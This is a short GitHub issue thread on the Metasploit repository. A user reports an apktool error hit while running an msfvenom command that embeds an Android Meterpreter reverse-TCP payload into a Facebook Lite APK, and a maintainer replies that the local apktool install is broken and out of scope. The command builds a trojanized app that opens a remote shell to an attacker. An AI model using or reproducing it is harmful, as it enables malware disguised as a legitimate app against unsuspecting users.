### ISSUE TITLE
how to fix

### ISSUE THREAD

**Issue by dev071** [rapid7/metasploit-framework#12139]
## Steps to reproduce

msfvenom -x fblite.apk -p android/meterpreter/reverse_tcp lhost=<ip> lport=8080 -o /home/deva/Desktop/fblite1.apk
Using APK template: fblite.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: Malformed version number string 2.3.4-dirty
/usr/bin/apktool: line 27: mkdir: command not found
/usr/bin/apktool: line 28: ln: command not found

**Comment by busterb** [comment]
Your version of apktool is damaged. Please examine /usr/bin/apktool to determine what is wrong and ensure that the tool works correctly first. This is outside of the scope of Metasploit framework. Thanks.
